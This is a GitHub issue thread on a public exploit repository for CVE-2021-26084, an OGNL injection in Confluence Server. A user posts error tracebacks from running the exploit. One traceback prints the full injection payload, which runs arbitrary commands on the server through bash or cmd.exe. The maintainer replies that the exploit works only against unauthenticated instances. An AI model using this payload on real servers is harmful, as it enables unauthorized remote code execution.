search

hev0x / CVE-2021-26084_Confluence

Confluence Server Webwork OGNL injection
306 stars 81 forks source link

TypeError: 'NoneType' object is not subscriptable #8

Closed 0xabdi closed 3 years ago

0xabdi commented 3 years ago 
└─# python3 confluence_exploit.py -u https://confluence.contoso.com -p /pages/createpage-entervariables.action?SpaceKey=x
---------------------------------------------------------------
[-] Confluence Server Webwork OGNL injection
[-] CVE-2021-26084
[-] https://github.com/h3v0x
--------------------------------------------------------------- 

> id
Traceback (most recent call last):
  File "/root/confluence_exploit.py", line 62, in <module>
    cmdExec()
  File "/root/confluence_exploit.py", line 57, in cmdExec
    queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
TypeError: 'NoneType' object is not subscriptable
0xabdi commented 3 years ago

When I run using python 2.7, I am getting the below error:

Traceback (most recent call last):
  File "confluence_exploit.py", line 62, in <module>
    cmdExec()
  File "confluence_exploit.py", line 53, in cmdExec
    xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
TypeError: cannot concatenate 'str' and 'builtin_function_or_method' objects
0xabdi commented 3 years ago

Realized I was not authenticate. Does the exploit only work against authenticated instances? If yes, we can close this issue.

hev0x commented 3 years ago

this exploit only works unauthenticated